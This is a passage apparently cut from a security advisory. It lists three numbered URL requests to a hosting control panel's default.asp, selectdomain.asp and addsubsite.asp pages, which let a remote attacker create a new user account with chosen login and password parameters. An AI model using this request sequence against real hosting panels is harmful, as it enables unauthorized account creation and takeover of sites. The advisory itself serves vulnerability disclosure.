3- [Remote Attacker] can make a new user.
3.1- Goto http://[HC URL]/hosting/default.asp?referral="http://"
3.2- Then http://[HC URL]/hosting/selectdomain.asp?htype=HTYPE
3.3- Then http://[HC URL]/hosting/addsubsite.asp?reseller=resadmin&loginname=Bugreport&password=something&email=Admin@Bugreport.ir&DomainName=Bugreport.com